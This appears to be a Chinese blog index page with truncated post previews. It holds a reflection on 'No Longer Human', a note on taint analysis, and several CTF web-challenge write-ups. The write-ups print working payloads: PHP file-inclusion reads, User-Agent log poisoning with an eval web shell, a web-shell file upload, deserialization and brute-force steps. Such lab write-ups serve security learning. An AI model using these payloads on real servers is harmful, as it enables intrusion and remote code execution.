重读人间失格前言一本高中附庸风雅买的小书, 似乎是某次月考结束买回家放松的 (彼时除了读书几乎是一切活动都被禁止了)
当时只为书中之人所感慨, 也有部分的同情和理解, 看了两遍也就束之高阁了, 结果大学之后突然觉得书中之人与本人如此之相似, 又或者我潜移默化的受其影响如此深刻.
于是再拿出这本书细读摘录, 也算是反思自身以及当今的社会形势是否和太宰治时期所处环境一样
本文预感会摘抄非常之多… 那么就开始和太宰治先生对话.. (跳过部分用符号…等价 , 原文并无这种标点)
手记之一关于吃饭还有, 我也从不知道饥肠辘辘是何等滋味…这倒不是故意炫耀自己生长在不愁吃穿的富贵人家, 我还不至于那么愚蠢, 只是真的对饥肠辘辘的感觉一无所知…“人不吃饭就会饿死”, 这句话在我听来, 无异于一种讨厌的恐吓, 但这种迷信(直到今天, 我依旧觉得这是一种迷信) 却总是带给我不安与恐惧“人不吃饭就会饿死”,在我看来, 没有比这句话更晦涩难懂 , 更带有威吓性的言辞了总之,我对人类的营生仍旧迷惑不解
幸福自己的幸福观与世上所有人的幸福观格格不入, 这让我深感不安, 并因为这种不安而每夜辗转难眠乃至精神发狂尽管 ...
web 11234567891011121314<?phpclass User { public $username = 'admin'; public $password = 'secure_password';}$a = new User();echo base64_encode(serialize($a))."\n";
EXX不是”恶心心” 是 xxe 漏洞
查看源码
123456789101112131415161718192021222324252627282930313233<script type="text/javascript">function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || passw ...
[toc]
一. 回顾是和 D3v3n 和 Lst4r 一块组的三人小队
9671 分, 排名 4/137
自己的话是 6 道 web 做了 5 道, 剩的一个 java 反序列化, 其他时间主要是在 MISC 方向帮帮队友. 密码 wish 套了个简单 web, 也算是看了眼题目
二. WP_Web1. Auto Unserialize [normal]这题的话正好比赛结束的时候 rd 问我了, 趁着刚好复现了就写了个比较详细的 wp , 这里直接黏贴过来了
虽然是一个有 16 解的 normal 难度的题目 , 但是从中却学到了不少东西, 题感也更像做过的为数不多的 web 题目 , 运气不错居然抢到了三血 ( 不容易 QwQ )
以下 wp 并不完全按照原题顺序分析
1) 文件上传123456789101112131415161718if (!empty($_FILES['file']['tmp_name'])) { $tmpName = $_FILES['file']['tmp_na ...
hacker
未读web 78 php 协议php://filter/read=convert.base64-encode/resource=flag.php
web 79 data 协议/?file=data://text/plain,("tac flag*");?>
web 80 日志包含配合日志文件进行 getshell,日志会记录访问 UA 信息,修改 UA 信息为后门代码,包含即执行后门代码
抓包->查看中间件->是 nginx
抓包->将 UA 改为后门代码->forward
包含:var/log/nginx/access.log
1/?file=/var/log/nginx/access.log
日志里会记录访问时间,访问者的 UA 信息->将 UA 信息改成后门代码->写入 log 文件(任何文件后缀都能被当作脚本去执行)
1User-Agent: <?php eval($_POST[c]);?>
web 81 日志包含响应头 ...
hacker
未读web 21以: username:passwd 然后 base64 加密 (a:a >> YTph)
Authorization: Basic YTph
发送 Intruder
payload : Custom iterator
option : < username >+< : >+
process : encode.base64
注意 需要取消勾选自动的 URL 编码
web 22子页面爆破 ( 跟御剑扫一样
挖掘工具 : BP 或者 在线子域名爆破 (zcjun.com)
web 231. python 爆破12345678if(isset($_GET['token'])){ $token = md5($_GET['token']); if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){ if((intva ...
SoapClient 反序列化 SSRF
考点是利用 SoapClient 类反序列化 + CRLF 实现 SSRF,构造请求访问 flag.php 得到 flag反序列化后的 SoapClient 对象在调用不存在的方法时会调用 __call,在 user_agent 中插入 CRLF 也就是 \r\n 控制 header 和 body 构造想要的请求
0x01 Soap( 1 ) soap
SOAP : Simple Object Access Protocol简单对象访问协议
简单而言,SOAP 是连接或 Web 服务或客户端和 Web 服务之间的接口
其采用 HTTP 作为底层通讯协议,XML 作为数据传送的格式
SOAP 消息基本上是从发送端到接收端的单向传输,但它们常常结合起来执行类似于请求 / 应答的模式
一条 SOAP 消息的组成:一个包含有一个必需的 SOAP 的封装包,一个可选的 SOAP 标头和一个必需的 SOAP 体块的 XML 文档
12345678910111213141516171819<?xml v ...
hacker
未读
为大创做点准备
关于软件漏洞分析应用JAVA 学习为重中之重..
Soot 静态分析
FlowDroid 污点分析
参考文献移动应用安全常用组件Soot软件漏洞分析
2.1 数据流分析使用 Soot 进行程序静态分析, 参考https://fynch3r.github.io/soot%E7%9F%A5%E8%AF%86%E7%82%B9%E6%95%B4%E7%90%86/
2.2 污点分析使用 FlowDroid 进行
2.2.1 污点分析是什么污点 是在代码中直接引入 不受信任的数据源 或者 敏感数据 等数据源这些污点存在于代码中会导致存在 数据完整性 或者 数据保密性 受到威胁
污点分析是跟踪分析污点信息再程序中流动的技术漏洞分析中, 使用污点分析技术将所感兴趣的数据 ( 通常来自程序的外部输入 ) 标记为污点数据, 然后通过相关信息流动从而得知它们是否影响某些关键程序操作, 进而挖掘程序漏洞即 将程序是否存在某种漏洞的问题 转化为 “污点信息是否会被 Sink 点上的操作所使用” 的问题
污点分析就是分析程序中由污点源点 引入的数据是否能够不经清理 (校验等) 处理, 而直 ...
hacker
未读web 89123456789if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}
num 不能含有 0-9 , 但是需要是数字
传入空数组 ( 被认为是零 )
?num[]=1
web 901234567891011if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===44 ...
hacker
未读web 1查看源码 注释部分
web 2禁用右键和 F12, 使用 Ctrl+U 查看源文件(注释部分)
web 3BP 抓取返回包 或者 在’网络’中读取
web 4读取../robots.txt
web 5读取../index.phps
web 6读取../www.zip
web 7.git 泄露 , 访问../.git
web 8.svn 泄露 , 访问../.svn
web 9swp 临时文件泄露
访问 ../index.php.swp
(这是 vim 没有正常保存产生的 index.php 的备份文件)
web 10在’网络’中读取 cookie 值
web 11查找 flag.ctfshow.com 域名下的 txt 记录
域名 txt 记录查询
(这题可能环境坏了 直接给了 wp 和 flag 无法真正复现)
也可以用 nslookup
1nslookup -qt=txt flag.ctfshow.com
web 12提示说 “有时候网站上的公开信息,就是管理员常用密码”
某些信息:
1Help Line ...
hacker
未读web 151 前端检测在 bp 修改文件类型就能绕过前端检测
抓包上传
123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: form-data; name="file"; filename="WD.php"Content-Type: image/png<?phpeval($_POST[1]);-----------------------------249623824540300659272997113405--AntSword: ../upload/WD.phpPassword: 1
web 152抓包上传
123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: f ...